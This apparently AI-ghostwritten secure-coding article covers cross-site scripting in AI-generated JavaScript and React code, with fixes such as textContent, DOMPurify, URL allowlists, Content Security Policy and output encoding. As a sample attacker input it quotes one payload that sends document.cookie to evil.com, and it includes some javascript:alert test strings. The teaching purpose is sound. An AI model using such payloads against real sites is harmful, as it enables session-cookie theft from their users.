The 86% XSS Failure Rate in AI-Generated Code
Veracode tested more than one hundred large language models against a standard set of web security benchmarks. Eighty-six percent failed on cross-site scripting (XSS) tests. Not edge cases — basic, well-documented attack patterns that any security-aware developer learns in their first year.
This is not a quirk of a specific model or version. It is a systematic pattern: AI models have absorbed millions of code examples that prioritize making things work over making things secure. The ratio of "code that renders user input" to "code that renders user input safely" in the training corpus heavily favors the unsafe version, simply because the safe version is less common in the wild.
Understanding why AI fails at XSS helps you know exactly where to look when reviewing AI-generated web code.
How XSS Works and Why AI Gets It Wrong
XSS is simple: an attacker injects malicious JavaScript into a page, which then executes in other users' browsers. It can steal session tokens, redirect users to phishing sites, or silently exfiltrate data.
The most common attack vector is user input that gets rendered into the DOM without sanitization. AI generates this constantly:
// AI writes this without hesitation
document.getElementById('comment').innerHTML = userComment;
// What an attacker submits as userComment:
// <img src=x onerror="fetch('https://evil.com/?c='+document.cookie)">
The fix is one line:
// Safe: text content, not HTML content
document.getElementById('comment').textContent = userComment;
But AI defaults to the unsafe pattern because it is more common in training data. It does not know the difference matters. You have to.
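When you cannot avoid building an HTML string (server-side templates, email bodies), escape at the boundary instead. A minimal sketch; the escapeHtml helper here is illustrative, not a standard API:

```javascript
// Escapes the five characters that can break out of an HTML text
// or attribute context. Illustrative helper, not a standard API.
function escapeHtml(str) {
  return String(str)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// The payload from above becomes inert text:
escapeHtml('<img src=x onerror="alert(1)">');
// → &lt;img src=x onerror=&quot;alert(1)&quot;&gt;
```

In the browser, prefer textContent; hand-escaping is for contexts where no DOM API or auto-escaping template engine is available.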
Input Sanitization
When you actually need to allow some HTML — rich text editors, comment formatting, markdown rendering — sanitization is essential. The de facto standard library is DOMPurify:
import DOMPurify from 'dompurify';
// Safe: DOMPurify strips dangerous elements and attributes
const clean = DOMPurify.sanitize(userContent, {
ALLOWED_TAGS: ['b', 'i', 'em', 'strong', 'a', 'p', 'ul', 'ol', 'li'],
ALLOWED_ATTR: ['href', 'title'],
ALLOW_DATA_ATTR: false,
});
document.getElementById('comment').innerHTML = clean;
React has an escape hatch for injecting raw HTML: a prop called dangerouslySetInnerHTML (the same prop applies in Next.js or any other React framework).
The name is a warning. Run untrusted content through DOMPurify before passing anything to it:
// Dangerous — do not do this with untrusted content
// <div dangerouslySetInnerHTML={{ __html: userContent }} />
// Safe — sanitize first
const safeHtml = DOMPurify.sanitize(userContent);
// <div dangerouslySetInnerHTML={{ __html: safeHtml }} />
Why React's JSX Is Safer (But Not Bulletproof)
React's JSX escapes text content by default. When you write `<p>{userComment}</p>`, React converts the value to a text node: angle brackets become `&lt;` and `&gt;`, so no HTML executes.
This is why React is generally safer than vanilla JS for rendering user content.
But JSX does not protect you from:
- The `dangerouslySetInnerHTML` prop (see above)
- URL injection in `href` attributes: `<a href={userUrl}>` where `userUrl` is `javascript:alert(1)`
- Template string injection if you bypass JSX to build HTML manually
The safe pattern for user-controlled URLs:
function SafeLink({ href, children }) {
// Only allow http and https protocols
const isSafe = href.startsWith('https://') || href.startsWith('http://');
return isSafe ? <a href={href}>{children}</a> : <span>{children}</span>;
}
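A stricter variant (a sketch, not a drop-in replacement) runs the value through the URL parser, which also catches mixed-case schemes like JavaScript:alert(1) and leading whitespace that a raw startsWith check misses:

```javascript
// Allowlist protocols via the URL parser. The parser lowercases the
// scheme and strips leading whitespace, so "JavaScript:" and
// " javascript:" payloads are caught.
function isSafeHref(href) {
  try {
    // The base URL lets relative links ("/about") parse instead of throwing.
    const url = new URL(href, 'https://example.com');
    return url.protocol === 'https:' || url.protocol === 'http:';
  } catch {
    return false; // unparseable input is treated as unsafe
  }
}
```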
Content Security Policy
CSP is a browser-enforced security layer that tells the browser which scripts, styles, and resources are allowed to load. A properly configured CSP can prevent XSS attacks even when your code has vulnerabilities — the malicious script simply will not execute because the browser refuses to run it.
AI-generated Next.js apps almost never include a CSP header. You have to add it manually.
In next.config.js:
const securityHeaders = [
{
key: 'Content-Security-Policy',
value: [
"default-src 'self'",
"script-src 'self' 'nonce-{NONCE}'", // use nonces for inline scripts
"style-src 'self' 'unsafe-inline'", // tighten once you audit inline styles
"img-src 'self' data: https:",
"font-src 'self'",
"connect-src 'self' https://api.yourdomain.com",
"frame-ancestors 'none'", // prevents clickjacking
].join('; '),
},
];
Start with a report-only policy (Content-Security-Policy-Report-Only) to identify violations
before enforcing. Add a report-uri (or the newer report-to) directive to capture them.
Output Encoding: The Missing Last Step
Sanitization is about what goes in. Output encoding is about what comes out. When data moves between contexts — database to HTML, HTML to JavaScript, JavaScript to URL — the encoding must match the destination context.
AI-generated code regularly skips this. A practical checklist:
- HTML context: use `textContent` or a templating system that auto-escapes
- JavaScript context: use `JSON.stringify()` before embedding data in script tags
- URL context: use `encodeURIComponent()` for query parameters
- CSS context: never embed user data in CSS values (use CSS custom properties set via JS instead)
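The JavaScript and URL contexts from the checklist can be sketched in a few lines (values here are illustrative). One subtlety the checklist glosses over: JSON.stringify alone does not neutralize a closing script tag inside a string, so also escape the angle bracket when embedding in an inline script:

```javascript
const userInput = '</script><script>alert(1)</script>';

// URL context: encodeURIComponent makes the value safe in a query string.
const query = 'https://example.com/search?q=' + encodeURIComponent(userInput);

// JavaScript context: JSON.stringify escapes quotes, but "</script>" inside
// a string can still close an inline <script> tag, so escape "<" as \u003c
// (a JSON-legal escape that parses back to the same string).
const embedded = JSON.stringify(userInput).replace(/</g, '\\u003c');
```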
What to Do Next
- Search your codebase for `innerHTML` and audit every instance. Does it contain user input? If yes, switch to `textContent` or add DOMPurify sanitization.
- Add a Content Security Policy to your Next.js or Express app. Start in report-only mode. It will immediately surface XSS vulnerabilities you did not know existed.
- Add a prompt constraint for AI-generated form code: "Never assign untrusted content to innerHTML. Always use textContent for user-controlled content. Always include input sanitization." This alone will significantly reduce the XSS surface area in AI-generated code.
The 86% failure rate is not destiny. It is a default you can override with supervision.
🤖 Ghostwritten by Claude Opus 4.6 · Curated by Tom Hundley